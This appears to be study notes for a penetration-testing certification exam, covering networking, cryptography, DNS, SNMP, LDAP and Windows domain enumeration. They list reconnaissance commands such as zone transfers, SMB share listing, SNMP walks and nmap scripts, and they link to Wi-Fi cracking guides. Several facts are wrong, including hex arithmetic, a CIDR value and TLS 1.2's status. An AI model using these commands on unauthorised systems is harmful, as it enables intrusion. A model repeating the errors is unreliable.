Based on Syllabus 2.3
https://www.crest-approved.org/examination/practitioner-security-analyst/index.html

A: Soft Skills and Assessment Management

For this Appendix A, think about how you would acoomplish the requirements. As these are softskills, and dependent on the scenarios, there are no hard answers.

A1: Engagement Lifecycle

  • Benefits and utility of penetration testing to the client.
  • Structure of penetration testing, including the relevant processes and procedures.
  • Concepts of infrastructure testing and application testing, including black box and white box formats.
  • Project closure and debrief

Black box format: Pentester does not know anything about the app or environment.

Grey box format: Pentester has some information, and possibly given some user access for testing

White box format: Pentester given all infrastructure information or even the relevant source code. From source code and static code analysis, the pentester can use vulnerabilities found to attack.

A2: Law and Compliance

Knowledge of pertinent UK legal issues:
- Computer Misuse Act 1990
- Human Rights Act 1998
- Data Protection Act 1998
- Police and Justice Act 2006
Impact of this legislation on penetration testing activities.
Awareness of sector-specific regulatory issues.

A3: Scoping

  • Understanding client requirements.
  • Scoping project to fulfil client requirements.
  • Accurate timescale scoping.
  • Resource planning.

A4: Understanding, Explaining and Managing Risk

  • Knowledge of additional risks that penetration testing can present.
  • Levels of risk relating to penetration testing, the usual outcomes of such risks materialising and how to mitigate the risks.
  • Effective planning for potential DoS conditions.

If possible, do not do Pentest on production environments.
However, most of the time for smaller companies with lesser resouces, we have to do it on production.

Some additional risks:
- Personal Data is accessed. Make sure it is part of the agreed scope, and do not store or send the information found. The person reviewing the pentest results may not be authorizes to view the personal data found.
- Denial of Service conditions. Make sure that the dev team has backups or a contigency plans available. If test is done on production, perhaps do the pentest at night or when the usage of the application is low.
- Remove all payloads that yoe have put in. If any configuration files are changed, change them back. It is best to have the dev team do reverts.
- Do not use any tools that you do not understand. Tools found online may be useful, but some malware may also have been inserted along with it. The tool may also function in a way that causes unexpected behaviors, so be careful.

A5: Record Keeping, Interim Reporting & Final Results

  • Understanding reporting requirements.
  • Understanding the importance of accurate and structured record keeping during the engagement.

After the initial pentest, there may be a requirement for another pentest after rectifying the issues found as well.

B: Core Technical Skills

B1: IP Protocols

Requirements:
IP protocols: IPv4 and IPv6, TCP, UDP and
ICMP.
Awareness that other IP protocols exist.

Internet Protocol V4

32-bits
0.0.0.0
to
255.255.255.255
11111111.11111111.11111111.11111111
Usually represented as base10 numbers

Internet Protoco V6

128-bits
0000:0000:0000:0000:0000:0000:0000:0000
to
ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Usually represented as base16 hexadecimal numbers

A good breakdown written by a Lawrence Williams.
https://www.guru99.com/difference-ipv4-vs-ipv6.html

Transmission Control Protocol(TCP)

Commonly used for web technologies.
Has sequencing, error checking and such. Hence it is reliable data transmission.

User Datagram Protocol UDP

Commonly used for data that does not need checking, such as video streaming.
Does not have sequencing and error checking.

More reading:
https://www.lifesize.com/en/blog/tcp-vs-udp/

Internet Control Message Protocol (ICMP)

Commonly used by routers, network devices and interfaces to check for errors and operational information within a network.

For example the famous ping command is done over ICMP.
ping 127.0.0.1

B2: Network Architectures

Requirements:
Varying networks types that could be
encountered during a penetration test:
• CAT 5 / Fibre
• 10/100/1000baseT
• Token ring
• Wireless (802.11)
Security implications of shared media,
switched media and VLANs.

10/100/1000baseT

1000BASE-T (also known as IEEE 802.3ab) is a standard for Gigabit Ethernet over >copper wiring.

Each 1000BASE-T network segment is recommended to be a maximum length of 100 >meters (330 feet),[3][a] and must use Category 5 cable or better (including Cat >5e and Cat 6).

https://en.wikipedia.org/wiki/Gigabit_Ethernet
https://en.wikipedia.org/wiki/2.5GBASE-T_and_5GBASE-T

1000BASE-T is Gigabit ethernet.
100BASE-T is Fast ethernet.

More here at:
https://en.wikipedia.org/wiki/Category_5_cable, under applications

Cat 5, 5e, 6, 7 Ethernet Cables

Mbps = megabits per second
Gbps = gigabits per second

Cable Max Frequency Potential Throughput
5 100MHz 100Mbps
5e 100MHz 1Gbps
6 250MHz 1Gbps
7 600MHz 10Gbps

There is rarely shielding for the cable, hence the cables are susceptible to solar flares and electronic interference.

Implications: A strong magnet near a cable can interfere communications.
We can also do cable splicing on a cable to preform man-in-the-middle attacks.

Optical Fibre Cables

https://en.wikipedia.org/wiki/Fiber-optic_communication

The wires are using light to communicate, instead of electrical waves. Fragile.
Often used to carry large amount of data such as international undersea internet cables, connecting from Internet Service Providers to our homes or local hubs.

Token Ring

It is a competitor to Eternet in the 1980s, developed by IBM.
It is rarely used in modern context.
Likely seen in legacy IBM systems

Wireless (802.11)

Technical standard for wireless local area network.

IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz, 5 >GHz, 6 GHz, and 60 GHz frequency bands.

In 2021, we will likely see 802.11ac wireless routers in electronics shops and office network setups.
https://en.wikipedia.org/wiki/IEEE_802.11

Virtual Local Area Network(VLAN)

VLAN is often used to seperate out portions of users or servers.
For example,
Executive deparment:
10.1.1.XXX
Sales department:
192.168.10.XXX
Guest
10.20.33.30-45
Voice over IP (Think Cisco office phones)
Storage Area Network(SAN)
Et cetera.

VLAN enables this to be run on a single network hardware, without having geographical limitations.

https://en.wikipedia.org/wiki/Virtual_LAN

Security implications of shared media,switched media and VLANs.

We can use VLANs for access control.
A person from the Guest network cannot access any data on the Sales department.

This also means that if the Sales department suffers an attack, the data in the the Executive department is safe, even though they are all in the same office.

Advanced settings can allow some cross communication.

B4: Network Mapping & Target Identification

Requirements:
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Network sweeping techniques to prioritise a target list and the potential for false negatives.

nmap <target_ip>

When nmap gives a "filtered" results, likely there is a firewall or some other issues.

We can use netcat or telnet to talk directly to the port to confirm the scan results.

B5: Interpreting Tool Output

Requirements:
Interpreting output from port scanners, network sniffers and other network enumeration tools.

Common network tools:
1. nmap
2. wireshark
3. tcpdump

B6: Filter avoidance techniques

Requirements:
The importance of egress and ingress filtering, including the risks associated with outbound connections.

Ingress Filtering

https://www.ncsc.gov.ie/emailsfrom/DDoS/Ingress-Egress/index.html

Ingress filtering is the practice of monitoring, controlling and restricting >traffic entering a network with the objective of ensuring that only legitimate traffic is allowed to enter and that unauthorised or malicious traffic is >prevented from doing so.

i.e. inbound traffic filtering.

For example, a file sharing device in an office should only receive packets from an IP within the office, or the restricted VLAN. We can ensure that the firewall rules are set as such.

Egress Filtering

Egress filtering is the practice of monitoring, controlling and restricting >traffic leaving a network with the objective of ensuring that only legitimate traffic is allowed to leave and that unauthorised or malicious traffic is prevented from doing so.

i.e. outbound traffic filtering.

We do not want to leak data to the world from SMB(port 445) for example.
We should block outbound traffic from port 445. Or if it is in use in the organization, we restrict it to known HOSTS of IP addresses.

This is important to prevent attackers from attaining reverse shells.

B8: OS Fingerprinting

Requirements:
- Remote operating system fingerprinting;
- active and passive techniques.

https://resources.infosecinstitute.com/topic/must-know-os-fingerprinting/

Active Fingerprinting

Directly send packets to find out information about a device.
e.g. Nmap scan is active fingerprinting. Once we see that NetBIOS, SMB, MSRPC services are running, we can safely assume it is a Windows machine.

Likely to be caught by Intrusion Prevension/Detection Systems

Passive Fingerprinting

Uses sniffing instead. Less likely to be detected.

Wireshark - Good for manual analysis
NetworkMiner - Good for automatic extraction of files, emails, etc.
https://www.netresec.com/?page=networkminer

B9: Application Fingerprinting and Evaluating Unknown Services

Requirements:
Determining server types and network application versions from application banners. Evaluation of responsive but unknown network applications.

Netcat, telnet

nc <target_ip> <target_port>

telnet <target_ip> <target_port>

For SMTP, we can send "HELO" or "EHLO". If there is a response, then it is confirmed that it is an SMTP or ESMTP service.

For web, we can send "GET / HTTP/1.1" to see if there is a HTTP response or not.

B10: Network Access Control Analysis

requirements:
Reviewing firewall rule bases and network access control lists.

https://www.cisco.com/c/en/us/products/security/what-is-network-access-control-nac.html

B11: Cryptography

requirements:

Differences between encryption and encoding.

Symmetric / asymmetric encryption

Encryption algorithms: DES, 3DES, AES,RSA, RC4.

Hashes: SHA1 and MD5

Message Integrity codes: HMAC

11.1: Encryption and Encoding

Encoding is a command "language" to format data so that different devices, services and applications can understand each other.
See UTF-8, unicode
https://en.wikipedia.org/wiki/Unicode

https://www.ascii-code.com/
ASCII is an early encoding format. We can encode alphabets and symbols into HTML format for example, so that browsers know how to display them.

Encoding is not meant for security.

Encryption is meant for security.
Data can be locked with a key, or passphrase. The receiver of the data needs the key to decrypt and access the data.

Without the key, even if we have the encrypted data on hand, the data is meaningless.

11.1.1: Symmetric Encryption

Both sender and receiver uses the same key to encrypt data.
For example Caesar's Cipher, also known as ROT13.

Plaintext: I am no good at math

Encrypt with ROT13: V nz ab tbbq ng zngu

Decrpting with ROT13: I am no good at math

There are common popular symmetric encryption standards today.

11.1.2: Asymmetric Encryption

Uses mathematics to produce a Public and Private key. Also called public-key cryptography.
https://en.wikipedia.org/wiki/Public-key_cryptography

A holds private and public key.

A sends public key out to B.

B encrypts data with the public key and sends it back to A.

A decrypts the ciphertext data with the private key.

This is more secure, as even if the public key is stolen, it will not affect data, as it cannot be used to decrypt.

However, if the Private Key is leaked, then the security of the data transaction is compromised.

Often used in current web technologies such as HTTPS.
Some encryption algoritms:

RSA

11.2: Encryption algorithms: DES, 3DES, AES,RSA, RC4.

11.2.1: Data Encryption Standard(DES)

https://en.wikipedia.org/wiki/Data_Encryption_Standard
Old. AES took over DES.

Symmetric Encryption

11.2.2: Triple DES (3DES)

https://en.wikipedia.org/wiki/Triple_DES
Modern version and more secure than DES. Now popular in electronic payment industries.

Symmetric Encryption

11.2.3: Advanced Encryption Standard AES

https://en.wikipedia.org/wiki/Advanced_Encryption_Standard
key sizes 128bits,...
1. AES-128
2. AES-192
3. AES-256

11.2.4: RSA

https://en.wikipedia.org/wiki/RSA_(cryptosystem)
Common usage in SSL, HTTPS web tecnologies.
Asymmetric Encryption

11.2.5: RC4

Considered insecure. removed from use in TLS in 2015.

11.3: Hashing

Hashing is used for error checking in data, amongst other users. It is commonly used to save passwords as hashed as well.
https://en.wikipedia.org/wiki/Hash_function

The data is "hashed", or chopped up like diced onions. We cannot put the data back together.

We have two files, A and B. If the hash of the 2 files are the same, we can be assured that the data is correct, and not tampered with or erronous

11.3.1: MD5

"hello"
5d41402abc4b2a76b9719d911017c592

Hello turns into the string that we see.

MD5 is considered weak hashing, and is not recommended for use in savving passwords. It is still used for error checking.

11.3.2: SHA-1

https://en.wikipedia.org/wiki/SHA-1
Considered weak.

11.3.3: SHA-2,3

SHA2 and 3 are the updated versions of the SHA algorithm family.
Commonly, we will see SHA-256 and SHA-512 in 2021.

11.3.4: HMAC

https://en.wikipedia.org/wiki/HMAC

https://en.wikipedia.org/wiki/Message_authentication_code

Used for Authenticating messages.

B12: Applications of Cryptography

Requirements:
SSL, IPsec, SSH, PGP
Common wireless (802.11) encryption protocols: WEP, WPA, TKIP

Secure Sockets Layer(SSL) / Transport Layer Security(TLS)

https://en.wikipedia.org/wiki/Transport_Layer_Security#SSL_1.0,_2.0,_and_3.0

Main points:
- SSL3.0 deprecated in 2015. Deemed vulnerable.
- TLS took over SSL.
- TLS1.3 is the latest version defined in 2018.
- SSL/TLS is used to secure web traffic for HTTPS.
- We use SSL/TLS to generate a certificate for use.

Generating a self-signed certificate for your website:
https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs

Internet Protocol Security(IPSec)

In computing, Internet Protocol Security (IPsec) is a secure network protocol suite that authenticates and encrypts the packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in virtual private networks (VPNs).

One of 2 common VPN tunneling protocols. It encrypts data for communications as well.

https://en.wikipedia.org/wiki/IPsec. The other is TLS/SSL

Here are other tunneling protocols for VPN: https://en.wikipedia.org/wiki/Virtual_private_network

Secure-Shell (SSH)

https://en.wikipedia.org/wiki/Secure_Shell

https://www.openssh.com/

SSH is used for remote access to a server/computer.

Pretty Good Privacy(PGP)

https://en.wikipedia.org/wiki/Pretty_Good_Privacy
https://www.openpgp.org/
https://www.varonis.com/blog/pgp-encryption/

An encryption program used to encrypt emails, Harddrive disks.
Verifies identity of sender as well.

Initially used by activists, journalists to secure data and communications(Varonis.com,Sep 2021).

B13: File system Permissions

Requirements:
File permission attributes within Unix and Windows file systems and their security implications.
Analysing registry ACLs.

Linux

ls -la

The above command lists files with attributes.

You will see

owner - group - others

7 7 7

https://www.guru99.com/file-permissions.html

Important attributes are:SUID bits, execution bits, which group can do what, what can the "others" permission do.

Windows

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

icacls <file_path>

For permissions that will be displayed, see link, under "Remarks" section.

B14: Audit Techniques

Requirements:
Listing processes and their associated network sockets (if any).
Assessing patch levels.
Finding interesting files.

Linux

uname -a

ps -aux

sudo lsof -i -P -n | grep LISTEN

netstat -ano

Windows

General information:

systeminfo

Patch Level:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Services:

wmic service list brief

Network status and services:

netstat -ano

Extras 1: Binary, Decimal and Hexadecimal Caluclations

Binary:

1 byte has 8 bits.

7 6 5 4 3 2 1 0
2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0
128 64 32 16 8 4 2 1

For 1 byte with value of 1111 1111:

7 6 5 4 3 2 1 0
1 1 1 1 1 1 1 1

Which will give us 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1 = 255 (Decimal Base10 representation)

Hexadecimals: Remember that hexadecimal has 16 digits, starting from 0, ending at F.

3 2 1 0
1 1 1 1

8+4+2 = 16 = F

Value of 1111 1111 in Hexadecimal representation:

7 6 5 4 3 2 1 0
1 1 1 1 1 1 1 1
F F

1 byte of data, with the value of 11111111 can be represented as:
- 11111111
- 255
- FF

Extras 2: MAC Address

A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment. This use is common in most IEEE 802 networking technologies, including Ethernet, Wi-Fi, and Bluetooth. Source:https://en.wikipedia.org/wiki/MAC_address

48-bit(6 Bytes) address space.

Example: A MAC address of 2c549188c9e3 is typically displayed as 2C:54:91:88:C9:E3 or 2c-54-91-88-c9-e3. Source: https://slts.osu.edu/articles/whats-a-mac-address-and-how-do-i-find-it/

Digits are in Hexadecimal.

EXTRAS 3: Network Classes and calculation

Source: https://en.wikipedia.org/wiki/Classful_network

Network Class Size of network number bit field Addresses per network Default subnet mask CIDR notation
A 24 2^24 = 16,777,216 255.0.0.0 /6
B 16 2^16 = 65536 255.255.0.0 /16
C 8 2^8 = 256 255.255.255.0 /24

Extras 3.1: Subnet calculation for number of addresses

Why is 255.255.255.0 denoted as /24?

11111111.11111111.11111111.00000000

There are 24 leading 1-bits. How do we calculate non default subnet mask ranges?

CIDR notation Binary Representation Decimal Representation
/25 11111111.11111111.11111111.10000000 255.255.255.128
/23 11111111.11111111.11111110.00000000 255.255.254.0

Write down number of leading 1-bits. Calculate the binary accordingly.

https://www.calculator.net/ip-subnet-calculator.html

C: Background Information Gathering & Open Source

C1: Registration Records(Domain Name)

Information contained within IP and domain
registries (WHOIS)

https://lookup.icann.org/

WHOIS usually has name, contact information of the person/organization which registere the domain name.

C2: Domain Name Server(DNS)

DNS queries and responses

DNS zone transfers

Structure, interpretation and analysis of DNS records

DNS is used to translate a domain name to an IP address. Like google.com.

Within an office, it is possible to set up some local services that uses DNS. e.g. http://salesfileshare.local

DNS Queries

1. Recursive Query

DNS Client sends request to DNS Resolver. Resolver must return an answer. Resolver will query to other Authoritative Name Servers before returning an answer.

2. Iterative Query

DNS Client sends request to DNS Resolver. Resolver return an answer as best as it can. If it does not have an answer, Resolver will refer the client to other Authoritative Name Servers.

3. Non-Recursive Query

DNS Client sends request to DNS Resolver. DNS already knows it answer to the DNS request. Responds to client immediately.

DNS Zone Transfers

https://www.sciencedirect.com/topics/computer-science/zone-transfer

Zone transfer is the process of copying the contents of the zone file on a primary DNS server to a secondary DNS server.

Used when deploying a new DNS server in local environment or internet.

DNS Zone Transfer Attack

dig axfr @<DNS_IP>

dig axfr @<DNS_IP> <DOMAIN>

The attack will reveal nameservers, or subdomains that we can attack or futher enumerate.

DNS Records

From Cloudflare:

A record - The record that holds the IP address of a domain. Learn more about the A record.

CNAME record - Forwards one domain or subdomain to another domain, does NOT provide an IP address. Learn more about the CNAME record. Maps a hostname to another hostname https://ns1.com/resources/cname

MX record - Directs mail to an email server. Learn more about the MX record.

TXT record - Lets an admin store text notes in the record. Learn more about the TXT record.

NS record - Stores the name server for a DNS entry. Learn more about the NS record.

SOA record - Stores admin information about a domain. Learn more about the SOA record.

SRV record - Specifies a port for specific services. Learn more about the SRV record.

PTR record - Provides a domain name in reverse-lookups. Learn more about the PTR record.

source: https://www.cloudflare.com/learning/dns/dns-records/

HINFO stores the host information, such as OS, CPU type etc
https://simpledns.plus/help/hinfo-records

Difference Between A and CNAME

An A Record maps a hostname to one or more IP addresses, while the CNAME record maps a hostname to another hostname.
Source: https://ns1.com/resources/cname

C3: Customer Website Analysis

Analysis of information from a target website, both from displayed content and from within the HTML source.

whatweb -v -a 3 <target_IP>

View Page source
1. Check Network Tab
2. Check Cookies
3. Check page source for app name, versions, etc

Burpsuite for HTTP request interception, forwarding, and analysis.

C4: Google Hacking and web enumeration

Effective use of search engines and other public data sources to gain information about a target.

Google Dorks

https://www.exploit-db.com/google-hacking-database

Google search parameters:

inurl:
intitle:
site:

Keywords include the target app name, or words like "admin", "login", "camera" etc.

C5: Network News Transfer Protocol(NNTP) - Newsgroups and Mailing Lists

Searching newsgroups or mailing lists for useful information about a target.

https://datatracker.ietf.org/doc/html/rfc977

NNTP specifies a protocol for the distribution, inquiry, retrieval, and posting of news articles using a reliable stream-based transmission of news among the ARPA-Internet community. NNTP is designed so that news articles are stored in a central database allowing a subscriber to select only those items he wishes to read. Indexing, cross-referencing, and expiration of aged messages are also provided.

nmap --script=nntp-ntlm-info <target_ip>

Authors Note: Might see NNTP in CTFs, perhaps not common in real-life pentest.

C6: Information leakage from Email & News Headers

Analysing news group and e-mail headers to identify internal system information.

https://sendpulse.com/support/glossary/email-header

https://security.stackexchange.com/questions/182841/does-an-email-header-source-contain-sensitive-information

Some possible "sensitive" data leak:
- Sender and recipient email addresses
- Server names, which could reveal FQDN of your internal domain
- Your organisations public IP address
- Information on servers that have handled the email
- TLS/SSL info & what ciphers you use (or don’t use)
- Banner information
- Email gateway details, SMTP, POP, IMAP etc
- What Anti-Virus you use to scan email

D: Networking Equipment

D1: Management Protocols

Weaknesses in the protocols commonly used for the remote management of devices:
- Telnet
- Web based protocols
- SSH
- SNMP (covering network information enumeration and common attacks against Cisco configurations)
- TFTP
- Cisco Reverse Telnet
- NTP

Telnet

Not encrypted, all in plaintext.

More details under Web Technologies.

Web based protocols

HyperText Transfer Protocol (HTTP)

Not encrypted, all in plaintext.

HTTPS

Secure, TLS1.3 is latest version. TLS1.2 was deemed vulnerable, and approaching end-of-life(in 2021).

Secure Shell(SSH)

Generally secure, depends on encryption.
If we have username and password, we can enter a system.
If we have the private key, we can login without username and password.

Simple Network Management Protocol(SNMP)

https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
Used by Network Management Systems(NMS) to monitor network infrastructure.

SNMPv1 unencrypted.

Latest SNMPv3 encrypted.

Opensource NMS

https://prometheus.io/

SNMP might leak credentials and other data.

If there is a write access, remote code execution is possible.

https://book.hacktricks.xyz/pentesting/pentesting-snmp

Trivial File Transfer Protocol(TFTP)

https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol#Security_considerations

Simple to implement.

No authentication or access control mechanisms.

Cisco reverse Telnet

Reverse Telnet allows the Telnet server to write to a computer terminal or device.

Telnet - Network to network

Reverse Telnet - Network to serial

*serial is hardware communication.

https://en.wikipedia.org/wiki/Serial_communication

Take a server rack for example.It has a servers, modems, routers and switches on it, possible connected via serial through the router.

It can sometimes be seen as:

Attacker -> Router -> console on device

https://community.cisco.com/t5/switching/reverse-telnet/td-p/2159217

If we can access the router on the server rack, we might be able to access other devices on the network.

Network Time Protocol(NTP)

https://en.wikipedia.org/wiki/Network_Time_Protocol

Used to synchronize clock between computer systems in a network.
UDP port 123

Might leak system information, hostnames of the network etc

nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 <target_ip>

D2: Network Traffic Analysis

Techniques for local network traffic analysis. Analysis of network traffic stored in PCAP files.

https://www.wireshark.org/docs/wsug_html_chunked/ChapterWork.html

We can see raw data at each different layer:

Frame -> Ethernet -> IPv4 -> TCP -> Http

We can see Hexdump of data.

We can extract files from PCAP files.

For extracting HTTP files:
1. Open the .pcap file
2. File -> Export Objects -> HTTP...
3. Choose what you want to save.

For extracting FTP files:
1. Filter for FTP-DATA packets
2. Right-click -> Follow -> TCP Stream
3. Select RAW as the output type
4. Save the file

Some knowledge of reading hexdump might be needed, or experience to select which TCP streams to follow.

D3: Networking Protocols

Security issues relating to the networking protocols.

Protocol Description Security Issues
Address Resolution Protocol(ARP) Used for discovering MAC address in a network. No authentication. ARP Spoofing - Pretends to be another computer, used for man in the middle attacks
Dynamic Host Configuration Protocol(DHCP) Automatically assigns IP address to a new device in network. Commonly found in routers No authentication required, can be used to launch man-in-the-middle attacks, or unauthorized access to resources, or DoS
Cisco Discovery Protocol(CDP) Proprietary protocol. It is used to share information about other directly connected Cisco equipment, such as the operating system version and IP address. Information leakage
Hot Standby Router Protocol (HSRP) Cisco proprietary protocol. Provides redundancy for routers through virtual MAC addressess etc. DoS, take over active router.https://andrewroderos.com/attacking-hsrp/
Virtual Router Redundancy Protocol(VRRP) Similar to HSRP, but incompatible. Similar to HSRP
VLAN Trunking Protocol(VTP) Cisco proprietary protocol. Sends VLAN information to the whole of local area network. VTP-bomb. The network will use the configuration with highest configuration revision number. If a new switch is added to a network, with correct VTP domain name and password, but the switch has a higher revision number, the whole network will use the VTP information from the new switch, which will overwrite the current configuration.
Spanning Tree Protocol(STP) STP helps a network's traffic flow with less congestion, saving resources. -
Terminal Access Controller Access-Control System plus (TACACS+) Provides Authentication, Authorization and Accounting(AAA) services to the network. -

D4: IPSec 500/UDP

Enumeration and fingerprinting of devices running IPSec services.

nmap -sU -p 500 <target_IP>

ike-scan -M <target_IP>

D5: Voice over IP(VoIP)

5060 UDP/TCP unencrpyted

5061 UDP/TCP TLS encrypted

Enumeration and fingerprinting of devices running VoIP services.

Knowledge of the SIP protocol.

https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4

https://github.com/fozavci/viproy-voipkit

Similar to HTTP, request-response model with user-agent and URIs.

The following request types are common within SIP:

INVITE — Invites an account to join the call.

ACK —Confirmation regarding the invite of joining the call.

CANCEL — Canceling a queued call.

REGISTER — Registering the user against the SIP server.

OPTIONS — Shows the options the caller has.

BYE — Ends the call between both sides.

REFER — Shows that the receiver needs to communicate through a 3rd party by the information attached to the request.

SIP Requests/Responses:

1xx (Informational)

2xx (Success)

3xx (Redirection)

4xx (Failed requests)

5xx (Web server cannot complete request)

6xx (Global errors)

Typical SIP Interaction Structure:

1. Sender initiates an INVITE request.

2. Receiver sends back a 100 (Trying) response.

3. Sender starts ringing by sending a 180 (Ringing) response.

4. Receiver picks up the phone and a 200 success response is sent (OK).

5. ACK is sent by the initiator.

6. Call started using RTP.

7. BYE request sent to end the call.

Source: Vartai Security, 10 Mar 2020, Practical VoIP Penetration Testing

D6: Wireless

Enumeration and fingerprinting of devices running Wireless (802.11) services.
Knowledge of various options for encryption and authentication, and the relative methods of each.
- WEP
- TKIP
- WPA/WPA2
- EAP/LEAP/PEAP

https://www.aircrack-ng.org/doku.php?id=simple_wep_crack

Wired Equivalent Privacy(WEP)

Depracted and easily cracked, and password can be extracted once initialization vector(IV) are captured.

Standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialization vector (IV) to form the RC4 key.

Temporal Key Integrity Protocol(TKIP)

Interim replacement for WEP. Early versions considered deprecated and not recommended for use.

Was rebranded as WPA.

First, TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 cipher initialization.

Wi-Fi Protected Access WPA/WPA2

https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access

If the WIFI password is weak, it is easy to crack and find the passwords.

https://www.aircrack-ng.org/doku.php?id=cracking_wpa

WPA released in 2003 as a interim measure for WEP.

WPA2 released in 2004 as a more secure version.

WPA3 released in 2018 after security issues brought up.

Keys are pre-shared.

Extensible Authentication Protocol(EAP/LEAP/PEAP)

Extensible Authentication Protocol (EAP) is an authentication framework that is used in local area networks (LANs) and dial-up connections.

EAP is used primarily in wireless communication for authentication among clients and a wireless LAN. As a point-to-point (P2P) LAN data communication framework, EAP provides a range of authentication mechanisms, for example supporting one-time passwords (OTPs), smart cards, public-key encryption authentication, and digital certificates.

EAP’s major focus is on wireless network communication such as access points used to authenticate client-wireless/LAN network systems. A straightforward EAP flow would occur as follows: Using a transceiver, the client requests a wireless connection. The transceiver then gets client data and conveys it to the authentication where it is processed. The authenticator then requests client ID from the transceiver and once it is received the latter conveys a message to the client requesting the client ID. Once verified, the client ID is sent to the server.

Source: https://www.hypr.com/extensible-authentication-protocol-eap/

LEAP - Lightweight Extensible Authentication Protocol

PEAP - Protected Extensible Authentication Protocol

https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol

https://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol

Authentication framework used by WPA,WPA2 and WPA3.

https://documentation.meraki.com/MR/WiFi_Basics_and_Best_Practices/WPA3_Encryption_and_Configuration_Guide

LEAP built by Cisco. LEAP not recommended for use by Cisco.

PEAP is similar to EAP-TLS, which is EAP over TLS configuration for security. Recommended for use.

PEAP was jointly developed by Cisco Systems, Microsoft, and RSA Security

D7: Configuration Analysis

Analysing configuration files from the following types of Cisco equipment:
- Routers
- Switches
Interpreting the configuration of other manufacturers’ devices.

https://www.blackhillsinfosec.com/how-to-use-ccat-an-analysis-tool-for-cisco-configuration-files/

https://github.com/frostbits-security/ccat

E: Microsoft Windows Security Assessment

E1: Domain Reconaissance

Identifying domains/workgroups and domain membership within the target network.

Identifying key servers within the target domains.

Identifying and analysing internal browse lists.

Identifying and analysing accessible SMB shares

Identifying domains/workgroups and domain membership within the target network.

From outside a windows computer:

nslookup
nmap
name -dhcp
dig

Once we have access to a windows CMD or powershell:
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Identifying key servers within the target domains.

From nmap scans, we should see the name of the domain controllers if any.

net view

Identifying and analysing internal browse lists.

Browse List is the list of available shared network resources collected and distributed by the Computer Browser service on a Microsoft network.
Network Encyclopedia

https://en.wikipedia.org/wiki/Browser_service

net share
net view
net view \\<computer name> /All

https://www.tenforums.com/tutorials/112017-view-all-network-shares-windows-pc.html

Identifying and analysing accessible SMB shares.

net share
enum4linux <target_ip>
smbclient -L \\\\<target_ip>

*smbclient's option L lists shares. Remove the L option to connect.

Try anonymous login, if not, use other credentials.

E2: User Enumeration

Identifying user accounts on target systems and domains using NetBIOS, SNMP and LDAP.

Remote Procedure Call (RPCINFO)

Check out RPCINFO and its options.

Synopsis

rpcinfo [-m | -s] [host]

  • rpcinfo -p [host]
  • rpcinfo -T transport host prognum [versnum]
  • rpcinfo -l [-T transport] host prognum [versnum]
  • rpcinfo [-n portnum] -u host prognum [versnum]
  • rpcinfo [-n portnum] [-t] host prognum [versnum]
  • rpcinfo -a serv_address -T transport prognum [versnum]
  • rpcinfo -b [-T transport] prognum versnum
  • rpcinfo -d [-T transport] prognum versnum

https://linux.die.net/man/8/rpcinfo

https://www.ibm.com/docs/en/aix/7.2?topic=r-rpcinfo-command

NetBIOS

nbtscan <target_ip>
nmap -sV 172.16.1.102 --script nbstat.nse -v

SNMP

https://www.netadmintools.com/snmp-mib-and-oids

snmpwalk -c public -v1 -t <target_ip>
nmap --script "snmp* and not snmp-brute" <target_ip>

OIDs will be revealed, which will reveal running processes.

LDAP

nmap -n -sV --script "ldap* and not brute" <target_ip>
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"

We can change the DC data with other information that we have found. We can then find information for computers, users, administrators, etc.

E3: Active Directory

Active Directory Roles (Global Catalogue, Master Browser, FSMO)
Reliance of AD on DNS and LDAP
Group Policy (Local Security Policy)

AD roles

Global Catalogue

Handles AD queries and logon

Domain Master Browser

https://en.wikipedia.org/wiki/Domain_Master_Browser

Used when there are more than one network in the Windows Domain.
Each subnet/domain portion has a Master Browser, which will share the information with each other.

Once the browse list is collected and compiled, it is then transmitted to all the Master Browser again as the enterprise-wide browse list for the domain.

Flexible Single Master Operations(FSMO)

Flexible Single Master Operations (FSMO, F is sometimes "floating"; pronounced Fiz-mo), or just single master operation or operations master, is a feature of Microsoft's Active Directory (AD). As of 2005, the term FSMO has been deprecated in favour of operations masters.

FSMO is a specialized domain controller (DC) set of tasks, used where standard data transfer and update methods are inadequate. AD normally relies on multiple peer DCs, each with a copy of the AD database, being synchronized by multi-master replication. The tasks which are not suited to multi-master replication and are viable only with a single-master database are the FSMOs.

Source: https://en.wikipedia.org/wiki/Flexible_single_master_operation

The 5 FSMO roles are:

Schema Master – one per forest
Domain Naming Master – one per forest
Relative ID (RID) Master – one per domain
Primary Domain Controller (PDC) Emulator – one per domain
Infrastructure Master – one per domain

FSMO Roles: What do They do?
Schema Master: The Schema Master role manages the read-write copy of your Active Directory schema. The AD Schema defines all the attributes – things like employee ID, phone number, email address, and login name – that you can apply to an object in your AD database.

Domain Naming Master: The Domain Naming Master makes sure that you don’t create a second domain in the same forest with the same name as another. It is the master of your domain names. Creating new domains isn’t something that happens often, so of all the roles, this one is most likely to live on the same DC with another role.

